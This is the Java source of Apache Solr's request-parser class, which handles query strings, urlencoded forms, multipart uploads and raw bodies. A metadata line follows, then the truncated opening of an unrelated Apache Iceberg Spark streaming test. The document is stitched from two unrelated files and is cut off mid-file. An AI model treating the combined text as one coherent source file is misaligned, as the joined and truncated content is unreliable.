/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.servlet; import static org.apache.solr.common.params.CommonParams.PATH; import jakarta.servlet.MultipartConfigElement; import jakarta.servlet.http.HttpServletRequest; import jakarta.servlet.http.Part; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.lang.invoke.MethodHandles; import java.net.URI; import java.nio.ByteBuffer; import java.nio.charset.CharacterCodingException; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CodingErrorAction; import java.nio.charset.StandardCharsets; import java.nio.file.Path; import java.security.Principal; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.io.input.CloseShieldInputStream; import org.apache.lucene.util.IOUtils; import org.apache.solr.api.V2HttpCall; import org.apache.solr.common.SolrException; import org.apache.solr.common.SolrException.ErrorCode; import org.apache.solr.common.params.CommonParams; import 
org.apache.solr.common.params.MultiMapSolrParams; import org.apache.solr.common.params.SolrParams; import org.apache.solr.common.util.CommandOperation; import org.apache.solr.common.util.ContentStream; import org.apache.solr.common.util.ContentStreamBase; import org.apache.solr.common.util.FastInputStream; import org.apache.solr.common.util.StrUtils; import org.apache.solr.core.CoreContainer; import org.apache.solr.core.RequestHandlers; import org.apache.solr.core.SolrConfig; import org.apache.solr.core.SolrCore; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.request.SolrQueryRequestBase; import org.apache.solr.util.RTimerTree; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class SolrRequestParsers { private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass()); // Should these constants be in a more public place? public static final String MULTIPART = "multipart"; public static final String FORMDATA = "formdata"; public static final String RAW = "raw"; public static final String SIMPLE = "simple"; public static final String STANDARD = "standard"; private static final Charset CHARSET_US_ASCII = StandardCharsets.US_ASCII; public static final String INPUT_ENCODING_KEY = "ie"; private static final byte[] INPUT_ENCODING_BYTES = INPUT_ENCODING_KEY.getBytes(CHARSET_US_ASCII); public static final String REQUEST_TIMER_SERVLET_ATTRIBUTE = "org.apache.solr.RequestTimer"; private final HashMap<String, SolrRequestParser> parsers = new HashMap<>(); private final boolean enableRemoteStreams; private final boolean enableStreamBody; private StandardRequestParser standard; /** * Default instance for e.g. admin requests. Limits to 2 MB uploads and does not allow remote * streams. */ public static final SolrRequestParsers DEFAULT = new SolrRequestParsers(); /** * Pass in an xml configuration. A null configuration will enable everything with maximum values. 
*/ public SolrRequestParsers(SolrConfig globalConfig) { final int multipartUploadLimitKB, formUploadLimitKB; if (globalConfig == null) { multipartUploadLimitKB = formUploadLimitKB = Integer.MAX_VALUE; enableRemoteStreams = false; enableStreamBody = false; } else { multipartUploadLimitKB = globalConfig.getMultipartUploadLimitKB(); formUploadLimitKB = globalConfig.getFormUploadLimitKB(); // security risks; disabled by default enableRemoteStreams = Boolean.getBoolean("solr.requests.streaming.remote.enabled"); enableStreamBody = Boolean.getBoolean("solr.requests.streaming.body.enabled"); // Let this filter take care of /select?xxx format } init(multipartUploadLimitKB, formUploadLimitKB); } private SolrRequestParsers() { enableRemoteStreams = false; enableStreamBody = false; init(Integer.MAX_VALUE, Integer.MAX_VALUE); } private void init(int multipartUploadLimitKB, int formUploadLimitKB) { MultipartRequestParser multi = new MultipartRequestParser(multipartUploadLimitKB); RawRequestParser raw = new RawRequestParser(); FormDataRequestParser formdata = new FormDataRequestParser(formUploadLimitKB); standard = new StandardRequestParser(multi, raw, formdata); // I don't see a need to have this publicly configured just yet // adding it is trivial parsers.put(MULTIPART, multi); parsers.put(FORMDATA, formdata); parsers.put(RAW, raw); parsers.put(SIMPLE, new SimpleRequestParser()); parsers.put(STANDARD, standard); parsers.put("", standard); } private static RTimerTree getRequestTimer(HttpServletRequest req) { final Object reqTimer = req.getAttribute(REQUEST_TIMER_SERVLET_ATTRIBUTE); if (reqTimer != null && reqTimer instanceof RTimerTree) { return ((RTimerTree) reqTimer); } return new RTimerTree(); } public SolrQueryRequest parse(SolrCore core, String path, HttpServletRequest req) throws Exception { SolrRequestParser parser = standard; // TODO -- in the future, we could pick a different parser based on the request // Pick the parser from the request... 
ArrayList<ContentStream> streams = new ArrayList<>(1); SolrParams params = parser.parseParamsAndFillStreams(req, streams); SolrQueryRequest sreq = buildRequestFrom(core, params, streams, getRequestTimer(req), req, req.getUserPrincipal()); // Handlers and login will want to know the path. If it contains a ':' // the handler could use it for RESTful URLs sreq.getContext().put(PATH, RequestHandlers.normalize(path)); sreq.getContext().put("httpMethod", req.getMethod()); return sreq; } /** For embedded Solr use; not related to HTTP. */ public SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams) throws Exception { return buildRequestFrom(core, params, streams, new RTimerTree(), null, null); } public SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams, Principal principal) throws Exception { return buildRequestFrom(core, params, streams, new RTimerTree(), null, principal); } private SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams, // might be added to but caller shouldn't depend on it RTimerTree requestTimer, final HttpServletRequest req, final Principal principal) // from req, if req was provided, otherwise from elsewhere throws Exception { // ensure streams is non-null and mutable so we can easily add to it if (streams == null) { streams = new ArrayList<>(); } else if (!(streams instanceof ArrayList)) { streams = new ArrayList<>(streams); } // The content type will be applied to all streaming content String contentType = params.get(CommonParams.STREAM_CONTENTTYPE); // Handle anything with a remoteURL String[] strs = params.getParams(CommonParams.STREAM_URL); if (strs != null) { if (!enableRemoteStreams) { throw new SolrException(ErrorCode.BAD_REQUEST, "Remote Streaming is disabled."); } for (final String url : strs) { ContentStreamBase stream = new ContentStreamBase.URLStream(URI.create(url).toURL()); if 
(contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } // Handle streaming files strs = params.getParams(CommonParams.STREAM_FILE); if (strs != null) { if (!enableRemoteStreams) { throw new SolrException( ErrorCode.BAD_REQUEST, "Remote Streaming is disabled. See https://solr.apache.org/guide/solr/latest/configuration-guide/requestdispatcher.html for help"); } for (final String file : strs) { ContentStreamBase stream = new ContentStreamBase.FileStream(Path.of(file)); if (contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } // Check for streams in the request parameters strs = params.getParams(CommonParams.STREAM_BODY); if (strs != null) { if (!enableStreamBody) { throw new SolrException( ErrorCode.BAD_REQUEST, "Stream Body is disabled. See https://solr.apache.org/guide/solr/latest/configuration-guide/requestdispatcher.html for help"); } for (final String body : strs) { ContentStreamBase stream = new ContentStreamBase.StringStream(body); if (contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } final HttpSolrCall httpSolrCall = req == null ? null : (HttpSolrCall) req.getAttribute(HttpSolrCall.class.getName()); SolrQueryRequestBase q = new SolrQueryRequestBase(core, params, requestTimer) { @Override public Principal getUserPrincipal() { return principal; } @Override public CoreContainer getCoreContainer() { return httpSolrCall != null ? 
httpSolrCall.cores : super.getCoreContainer(); } @Override public List<CommandOperation> getCommands(boolean validateInput) { if (httpSolrCall != null) { return httpSolrCall.getCommands(validateInput); } return super.getCommands(validateInput); } @Override public Map<String, String> getPathTemplateValues() { if (httpSolrCall != null && httpSolrCall instanceof V2HttpCall) { return ((V2HttpCall) httpSolrCall).getUrlParts(); } return super.getPathTemplateValues(); } @Override public HttpSolrCall getHttpSolrCall() { return httpSolrCall; } }; if (!streams.isEmpty()) { q.setContentStreams(streams); } return q; } private static HttpSolrCall getHttpSolrCall(HttpServletRequest req) { return req == null ? null : (HttpSolrCall) req.getAttribute(HttpSolrCall.class.getName()); } /** Given a url-encoded query string (UTF-8), map it into solr params */ public static MultiMapSolrParams parseQueryString(String queryString) { Map<String, String[]> map = new HashMap<>(); parseQueryString(queryString, map); return new MultiMapSolrParams(map); } /** * Given a url-encoded query string (UTF-8), map it into the given map * * @param queryString as given from URL * @param map place all parameters in this map */ static void parseQueryString(final String queryString, final Map<String, String[]> map) { if (queryString != null && queryString.length() > 0) { try { final int len = queryString.length(); // this input stream emulates to get the raw bytes from the URL as passed to servlet // container, it disallows any byte > 127 and enforces to %-escape them: final InputStream in = new InputStream() { int pos = 0; @Override public int read() { if (pos < len) { final char ch = queryString.charAt(pos); if (ch > 127) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: The query string contains a not-%-escaped byte > 127 at position " + pos); } pos++; return ch; } else { return -1; } } }; parseFormDataContent(in, Long.MAX_VALUE, StandardCharsets.UTF_8, map, true); } catch (IOException ioe) { 
throw new SolrException(ErrorCode.BAD_REQUEST, ioe); } } } /** * Given a url-encoded form from POST content (as InputStream), map it into the given map. The * given InputStream should be buffered! * * @param postContent to be parsed * @param charset to be used to decode resulting bytes after %-decoding * @param map place all parameters in this map */ @SuppressWarnings({"fallthrough", "resource"}) static long parseFormDataContent( final InputStream postContent, final long maxLen, Charset charset, final Map<String, String[]> map, boolean supportCharsetParam) throws IOException { CharsetDecoder charsetDecoder = supportCharsetParam ? null : getCharsetDecoder(charset); final List<Object> buffer = supportCharsetParam ? new ArrayList<>() : null; long len = 0L, keyPos = 0L, valuePos = 0L; final ByteArrayOutputStream keyStream = new ByteArrayOutputStream(), valueStream = new ByteArrayOutputStream(); ByteArrayOutputStream currentStream = keyStream; for (; ; ) { int b = postContent.read(); switch (b) { case -1: // end of stream case '&': // separator if (keyStream.size() > 0) { final byte[] keyBytes = keyStream.toByteArray(), valueBytes = valueStream.toByteArray(); if (Arrays.equals(keyBytes, INPUT_ENCODING_BYTES)) { // we found a charset declaration in the raw bytes if (charsetDecoder != null) { throw new SolrException( ErrorCode.BAD_REQUEST, supportCharsetParam ? ("Query string invalid: duplicate '" + INPUT_ENCODING_KEY + "' (input encoding) key.") : ("Key '" + INPUT_ENCODING_KEY + "' (input encoding) cannot " + "be used in POSTed application/x-www-form-urlencoded form data. 
" + "To set the input encoding of POSTed form data, use the " + "'Content-Type' header and provide a charset!")); } // decode the charset from raw bytes charset = Charset.forName( decodeChars(valueBytes, keyPos, getCharsetDecoder(CHARSET_US_ASCII))); charsetDecoder = getCharsetDecoder(charset); // finally decode all buffered tokens decodeBuffer(buffer, map, charsetDecoder); } else if (charsetDecoder == null) { // we have no charset decoder until now, buffer the keys / values for later // processing: buffer.add(keyBytes); buffer.add(Long.valueOf(keyPos)); buffer.add(valueBytes); buffer.add(Long.valueOf(valuePos)); } else { // we already have a charsetDecoder, so we can directly decode without buffering: final String key = decodeChars(keyBytes, keyPos, charsetDecoder), value = decodeChars(valueBytes, valuePos, charsetDecoder); MultiMapSolrParams.addParam(key.trim(), value, map); } } else if (valueStream.size() > 0) { throw new SolrException( ErrorCode.BAD_REQUEST, "application/x-www-form-urlencoded invalid: missing key"); } keyStream.reset(); valueStream.reset(); keyPos = valuePos = len + 1; currentStream = keyStream; break; case '+': // space replacement currentStream.write(' '); break; case '%': // escape final int upper = digit16(b = postContent.read()); len++; final int lower = digit16(b = postContent.read()); len++; currentStream.write(((upper << 4) + lower)); break; case '=': // kv separator if (currentStream == keyStream) { valuePos = len + 1; currentStream = valueStream; break; } // fall-through default: currentStream.write(b); } if (b == -1) { break; } len++; if (len > maxLen) { throw new SolrException( ErrorCode.BAD_REQUEST, "application/x-www-form-urlencoded content exceeds upload limit of " + (maxLen / 1024L) + " KB"); } } // if we have not seen a charset declaration, decode the buffer now using the default one (UTF-8 // or given via Content-Type): if (buffer != null && !buffer.isEmpty()) { assert charsetDecoder == null; decodeBuffer(buffer, map, 
getCharsetDecoder(charset)); } return len; } private static CharsetDecoder getCharsetDecoder(Charset charset) { return charset .newDecoder() .onMalformedInput(CodingErrorAction.REPORT) .onUnmappableCharacter(CodingErrorAction.REPORT); } private static String decodeChars(byte[] bytes, long position, CharsetDecoder charsetDecoder) { try { return charsetDecoder.decode(ByteBuffer.wrap(bytes)).toString(); } catch (CharacterCodingException cce) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Invalid character encoding detected after position " + position + " of query string / form data (while parsing as " + charsetDecoder.charset().name() + ")"); } } private static void decodeBuffer( final List<Object> input, final Map<String, String[]> map, CharsetDecoder charsetDecoder) { for (final Iterator<Object> it = input.iterator(); it.hasNext(); ) { final byte[] keyBytes = (byte[]) it.next(); it.remove(); final Long keyPos = (Long) it.next(); it.remove(); final byte[] valueBytes = (byte[]) it.next(); it.remove(); final Long valuePos = (Long) it.next(); it.remove(); MultiMapSolrParams.addParam( decodeChars(keyBytes, keyPos.longValue(), charsetDecoder).trim(), decodeChars(valueBytes, valuePos.longValue(), charsetDecoder), map); } } private static int digit16(int b) { if (b == -1) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Incomplete trailing escape (%) pattern"); } if (b >= '0' && b <= '9') { return b - '0'; } if (b >= 'A' && b <= 'F') { return b - ('A' - 10); } if (b >= 'a' && b <= 'f') { return b - ('a' - 10); } throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Invalid digit (" + ((char) b) + ") in escape (%) pattern"); } public boolean isEnableRemoteStreams() { return enableRemoteStreams; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // I guess we don't really even need the interface, but i'll keep it here just for kicks interface 
SolrRequestParser { public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- /** The simple parser just uses the params directly, does not support POST URL-encoded forms */ static class SimpleRequestParser implements SolrRequestParser { @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { return parseQueryString(req.getQueryString()); } } /** Wrap an HttpServletRequest as a ContentStream */ static class HttpRequestContentStream extends ContentStreamBase { private final InputStream inputStream; public HttpRequestContentStream(HttpServletRequest req, InputStream inputStream) { this.inputStream = inputStream; this.contentType = req.getContentType(); // name = ??? // sourceInfo = ??? String v = req.getHeader("Content-Length"); if (v != null) { size = Long.valueOf(v); } } @Override public InputStream getStream() throws IOException { // we explicitly protect this servlet stream from being closed // so that it does not trip our test assert in our close shield // in SolrDispatchFilter - we must allow closes from getStream // due to the other impls of ContentStream return new CloseShieldInputStream(inputStream); } } /** The raw parser just uses the params directly */ static class RawRequestParser implements SolrRequestParser { // Methods that shouldn't have a body according to HTTP spec private static Set<String> NO_BODY_METHODS = Set.of("GET", "HEAD", "DELETE"); @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { if (req.getContentLengthLong() > 0 || req.getHeader("Transfer-Encoding") != null || !NO_BODY_METHODS.contains(req.getMethod())) { // If Content-Length > 0 OR Transfer-Encoding exists OR // 
it's a method that can have a body (POST/PUT/PATCH etc) streams.add(new HttpRequestContentStream(req, req.getInputStream())); } return parseQueryString(req.getQueryString()); } } /** Extract Multipart streams */ static class MultipartRequestParser implements SolrRequestParser { private final MultipartConfigElement multipartConfigElement; public MultipartRequestParser(int uploadLimitKB) { multipartConfigElement = new MultipartConfigElement( null, // temp dir (null=default) -1, // maxFileSize (-1=none) uploadLimitKB * 1024L, // maxRequestSize 100 * 1024); // fileSizeThreshold after which will go to disk } @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { if (!isMultipart(req)) { throw new SolrException( ErrorCode.BAD_REQUEST, "Not multipart content! " + req.getContentType()); } // Magic way to tell Jetty dynamically we want multi-part processing. // This is taken from: // https://github.com/eclipse/jetty.project/blob/jetty-10.0.12/jetty-server/src/main/java/org/eclipse/jetty/server/Request.java#L144 req.setAttribute("org.eclipse.jetty.multipartConfig", multipartConfigElement); MultiMapSolrParams params = parseQueryString(req.getQueryString()); // IMPORTANT: the Parts will all have the delete() method called by cleanupMultipartFiles() for (Part part : req.getParts()) { if (part.getSubmittedFileName() == null) { // thus a form field and not file upload // If it's a form field, put it in our parameter map String partAsString = StrUtils.stringFromReader(new PartContentStream(part).getReader()); MultiMapSolrParams.addParam(part.getName().trim(), partAsString, params.getMap()); } else { // file upload streams.add(new PartContentStream(part)); } } return params; } /** Wrap a MultiPart-{@link Part} as a {@link ContentStream} */ static class PartContentStream extends ContentStreamBase { private final Part part; public PartContentStream(Part part) { this.part = part; contentType = 
part.getContentType();
// NOTE(review): this chunk begins mid-definition — the lines above are the tail of a
// constructor in a Part-wrapping ContentStream inner class whose header is outside this view;
// it captures the multipart part's content type, name, submitted file name and size.
name = part.getName();
sourceInfo = part.getSubmittedFileName();
size = part.getSize();
}

@Override
public InputStream getStream() throws IOException {
  // Stream the raw bytes of the wrapped multipart part.
  return part.getInputStream();
}
}
}

/** Returns true if the request carries multipart/form-data content. */
public static boolean isMultipart(HttpServletRequest req) {
  String ct = req.getContentType();
  return ct != null && ct.startsWith("multipart/form-data");
}

/** Clean up any files created by MultiPartInputStream. */
static void cleanupMultipartFiles(HttpServletRequest request) {
  if (!SolrRequestParsers.isMultipart(request)) {
    return;
  }
  log.debug("Deleting multipart files");
  Collection<Part> parts;
  try {
    parts = request.getParts();
  } catch (Exception e) {
    // Deletion is best-effort: log and bail out rather than fail the request.
    assert false : e.toString();
    log.error("Couldn't get multipart parts in order to delete them", e);
    return;
  }
  for (Part part : parts) {
    try {
      part.delete();
    } catch (IOException e) {
      // Keep deleting the remaining parts even if one fails.
      log.warn("Errors deleting multipart tmp files", e);
    }
  }
}

/** Extract application/x-www-form-urlencoded form data for POST requests */
static class FormDataRequestParser implements SolrRequestParser {

  private static final long WS_MASK =
      (1L << ' ')
          | (1L << '\t')
          | (1L << '\r')
          | (1L << '\n')
          | (1L << '#')
          | (1L << '/')
          | (0x01); // set 1 bit so 0xA0 will be flagged as possible whitespace

  // Maximum accepted form body size, in kilobytes.
  private final int uploadLimitKB;

  public FormDataRequestParser(int limit) {
    uploadLimitKB = limit;
  }

  /**
   * Parses URL query parameters plus the urlencoded request body into a single parameter map.
   *
   * @param req the incoming request
   * @param streams output list of content streams (unused by this parser)
   * @param in the body stream to read, or null to read from the request itself
   */
  public SolrParams parseParamsAndFillStreams(
      HttpServletRequest req, ArrayList<ContentStream> streams, InputStream in) throws Exception {
    final Map<String, String[]> map = new HashMap<>();

    // also add possible URL parameters and include into the map (parsed using UTF-8):
    final String qs = req.getQueryString();
    if (qs != null) {
      parseQueryString(qs, map);
    }

    // may be -1, so we check again later. But if it's already greater we can stop processing!
    final long totalLength = req.getContentLength();
    final long maxLength = ((long) uploadLimitKB) * 1024L;
    if (totalLength > maxLength) {
      throw new SolrException(
          ErrorCode.BAD_REQUEST,
          "application/x-www-form-urlencoded content length ("
              + totalLength
              + " bytes) exceeds upload limit of "
              + uploadLimitKB
              + " KB");
    }

    // get query String from request body, using the charset given in content-type:
    final String cs = ContentStreamBase.getCharsetFromContentType(req.getContentType());
    final Charset charset = (cs == null) ? StandardCharsets.UTF_8 : Charset.forName(cs);

    try {
      // Protect container owned streams from being closed by us, see SOLR-8933
      in =
          FastInputStream.wrap(
              in == null
                  ? new CloseShieldInputStream(req.getInputStream())
                  : new CloseShieldInputStream(in));
      final long bytesRead = parseFormDataContent(in, maxLength, charset, map, false);
      // A declared non-zero Content-Length with zero bytes readable means something upstream
      // (e.g. a servlet filter calling getParameter*()) already consumed the body.
      if (bytesRead == 0L && totalLength > 0L) {
        throw getParameterIncompatibilityException();
      }
    } catch (IOException ioe) {
      throw new SolrException(ErrorCode.BAD_REQUEST, ioe);
    } catch (IllegalStateException ise) {
      throw (SolrException) getParameterIncompatibilityException().initCause(ise);
    } finally {
      IOUtils.closeWhileHandlingException(in);
    }

    return new MultiMapSolrParams(map);
  }

  @Override
  public SolrParams parseParamsAndFillStreams(
      HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception {
    if (!isFormData(req)) {
      throw new SolrException(
          ErrorCode.BAD_REQUEST,
          "Not application/x-www-form-urlencoded content: " + req.getContentType());
    }
    return parseParamsAndFillStreams(req, streams, null);
  }

  /** Error raised when the urlencoded body was consumed before Solr could read it. */
  public static SolrException getParameterIncompatibilityException() {
    return new SolrException(
        ErrorCode.SERVER_ERROR,
        "Solr requires that request parameters sent using application/x-www-form-urlencoded "
            + "content-type can be read through the request input stream. Unfortunately, the "
            + "stream was empty / not available. This may be caused by another servlet filter calling "
            + "ServletRequest.getParameter*() before SolrDispatchFilter, please remove it.");
  }

  /**
   * True if the request's Content-Type (ignoring any charset suffix) is
   * application/x-www-form-urlencoded.
   */
  public boolean isFormData(HttpServletRequest req) {
    String contentType = req.getContentType();
    if (contentType != null) {
      int idx = contentType.indexOf(';');
      if (idx > 0) {
        // remove the charset definition "; charset=utf-8"
        contentType = contentType.substring(0, idx);
      }
      contentType = contentType.trim();
      if ("application/x-www-form-urlencoded".equalsIgnoreCase(contentType)) {
        return true;
      }
    }
    return false;
  }
}

/** The default Logic */
static class StandardRequestParser implements SolrRequestParser {
  MultipartRequestParser multipart;
  RawRequestParser raw;
  FormDataRequestParser formdata;

  StandardRequestParser(
      MultipartRequestParser multi, RawRequestParser raw, FormDataRequestParser formdata) {
    this.multipart = multi;
    this.raw = raw;
    this.formdata = formdata;
  }

  /**
   * Dispatches to the multipart, form-data, or raw parser based on HTTP method and Content-Type.
   */
  @Override
  public SolrParams parseParamsAndFillStreams(
      final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception {
    String contentType = req.getContentType();
    String method = req.getMethod(); // No need to uppercase... HTTP verbs are case sensitive
    String uri = req.getRequestURI();
    boolean isV2 = getHttpSolrCall(req) instanceof V2HttpCall;
    boolean isPost = "POST".equals(method);

    // SOLR-6787 changed the behavior of a POST without content type. Previously it would throw
    // an exception, but now it will use the raw request parser.
    /*
    if (contentType == null && isPost) {
      throw new SolrException(ErrorCode.UNSUPPORTED_MEDIA_TYPE, "Must specify a Content-Type header with POST requests");
    }
    */

    // According to previous StandardRequestParser logic (this is a re-written version),
    // POST was handled normally, but other methods (PUT/DELETE)
    // were handled by the RestManager classes if the URI contained /schema or /config
    if (!isPost) {
      if (isV2) {
        return raw.parseParamsAndFillStreams(req, streams);
      }

      if (contentType == null) {
        return parseQueryString(req.getQueryString());
      }

      // This happens when Jetty redirected a request that initially had no content body
      if (contentType.equals("application/octet-stream") && req.getContentLength() == 0) {
        return parseQueryString(req.getQueryString());
      }

      // OK, we have a BODY at this point
      boolean schemaRestPath = false;
      int idx = uri.indexOf("/schema");
      if ((idx >= 0 && uri.endsWith("/schema")) || uri.contains("/schema/")) {
        schemaRestPath = true;
      }

      if (schemaRestPath) {
        return raw.parseParamsAndFillStreams(req, streams);
      }

      if ("PUT".equals(method) || "DELETE".equals(method)) {
        throw new SolrException(
            ErrorCode.BAD_REQUEST, "Unsupported method: " + method + " for request " + req);
      }
    }

    if (formdata.isFormData(req)) {
      String userAgent = req.getHeader("User-Agent");
      boolean isCurl = userAgent != null && userAgent.startsWith("curl/");

      FastInputStream input = FastInputStream.wrap(req.getInputStream());

      // curl clients sometimes send JSON/XML with a form-urlencoded content type;
      // sniff the first bytes and reroute if a different content type is detected.
      if (isCurl) {
        SolrParams params = autodetect(req, streams, input);
        if (params != null) return params;
      }

      return formdata.parseParamsAndFillStreams(req, streams, input);
    }

    if (isMultipart(req)) {
      return multipart.parseParamsAndFillStreams(req, streams);
    }

    // some other content-type (json, XML, csv, etc)
    return raw.parseParamsAndFillStreams(req, streams);
  }
}

private static final long WS_MASK =
    (1L << ' ')
        | (1L << '\t')
        | (1L << '\r')
        | (1L << '\n')
        | (1L << '#')
        | (1L << '/')
        | (0x01); // set 1 bit so 0xA0 will be flagged as possible whitespace

/** Returns the parameter map if a different content type was auto-detected */
private static SolrParams autodetect(
    HttpServletRequest req, ArrayList<ContentStream> streams, FastInputStream in)
    throws IOException {
  String detectedContentType = null;
  // Only close the stream on the null-return path's opposite: when we hand the stream off
  // to a ContentStream (or fail), ownership rules differ — see the finally block.
  boolean shouldClose = true;

  try {
    in.peek(); // should cause some bytes to be read
    byte[] arr = in.getBuffer();
    int pos = in.getPositionInBuffer();
    int end = in.getEndInBuffer();

    // we do "end-1" because we check "arr[i+1]" sometimes in the loop body
    for (int i = pos; i < end - 1; i++) {
      int ch = arr[i];
      boolean isWhitespace = ((WS_MASK >> ch) & 0x01) != 0 && (ch <= ' ' || ch == 0xa0);
      if (!isWhitespace) {
        // first non-whitespace chars
        if (ch == '#' // single line comment
            || (ch == '/'
                && (arr[i + 1] == '/' || arr[i + 1] == '*')) // single line or multi-line comment
            || (ch == '{' || ch == '[') // start of JSON object
        ) {
          detectedContentType = "application/json";
        }
        if (ch == '<') {
          detectedContentType = "text/xml";
        }
        break;
      }
    }

    if (detectedContentType == null) {
      // Looks like genuine form data after all — leave the stream open for the caller.
      shouldClose = false;
      return null;
    }

    Long size = null;
    String v = req.getHeader("Content-Length");
    if (v != null) {
      size = Long.valueOf(v);
    }
    streams.add(new InputStreamContentStream(in, detectedContentType, size));

    final Map<String, String[]> map = new HashMap<>();
    // also add possible URL parameters and include into the map (parsed using UTF-8):
    final String qs = req.getQueryString();
    if (qs != null) {
      parseQueryString(qs, map);
    }

    return new MultiMapSolrParams(map);
  } catch (IOException ioe) {
    throw new SolrException(ErrorCode.BAD_REQUEST, ioe);
  } catch (IllegalStateException ise) {
    throw (SolrException)
        FormDataRequestParser.getParameterIncompatibilityException().initCause(ise);
  } finally {
    if (shouldClose) {
      IOUtils.closeWhileHandlingException(in);
    }
  }
}

/** Wrap InputStream as a ContentStream */
static class InputStreamContentStream extends ContentStreamBase {
  private final InputStream is;

  public InputStreamContentStream(InputStream is, String detectedContentType, Long size) {
    this.is = is;
    this.contentType = detectedContentType;
    this.size = size;
  }

  @Override
  public InputStream getStream() throws IOException {
    return is;
  }
}
}
apache/iceberg
35,736
spark/v4.0/spark/src/test/java/org/apache/iceberg/spark/source/TestStructuredStreamingRead3.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg.spark.source; import static org.apache.iceberg.expressions.Expressions.ref; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatThrownBy; import java.io.File; import java.io.IOException; import java.util.Collections; import java.util.List; import java.util.Map; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicInteger; import java.util.stream.IntStream; import org.apache.iceberg.BaseTable; import org.apache.iceberg.DataFile; import org.apache.iceberg.DataFiles; import org.apache.iceberg.DataOperations; import org.apache.iceberg.DeleteFile; import org.apache.iceberg.FileFormat; import org.apache.iceberg.Files; import org.apache.iceberg.ParameterizedTestExtension; import org.apache.iceberg.RewriteFiles; import org.apache.iceberg.Schema; import org.apache.iceberg.Snapshot; import org.apache.iceberg.Table; import org.apache.iceberg.TableMetadata; import org.apache.iceberg.TableOperations; import org.apache.iceberg.TestHelpers; import org.apache.iceberg.data.FileHelpers; import org.apache.iceberg.data.GenericRecord; import org.apache.iceberg.data.Record; import 
org.apache.iceberg.expressions.Expressions; import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap; import org.apache.iceberg.relocated.com.google.common.collect.Iterables; import org.apache.iceberg.relocated.com.google.common.collect.Lists; import org.apache.iceberg.spark.CatalogTestBase; import org.apache.iceberg.spark.SparkReadOptions; import org.apache.spark.api.java.function.VoidFunction2; import org.apache.spark.sql.Dataset; import org.apache.spark.sql.Encoders; import org.apache.spark.sql.Row; import org.apache.spark.sql.internal.SQLConf; import org.apache.spark.sql.streaming.DataStreamWriter; import org.apache.spark.sql.streaming.OutputMode; import org.apache.spark.sql.streaming.StreamingQuery; import org.apache.spark.sql.streaming.Trigger; import org.junit.jupiter.api.AfterEach; import org.junit.jupiter.api.BeforeAll; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.TestTemplate; import org.junit.jupiter.api.extension.ExtendWith; @ExtendWith(ParameterizedTestExtension.class) public final class TestStructuredStreamingRead3 extends CatalogTestBase { private Table table; private final AtomicInteger microBatches = new AtomicInteger(); /** * test data to be used by multiple writes each write creates a snapshot and writes a list of * records */ private static final List<List<SimpleRecord>> TEST_DATA_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")), Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven"))); /** * test data - to be used for multiple write batches each batch inturn will have multiple * snapshots */ private static final List<List<List<SimpleRecord>>> TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new 
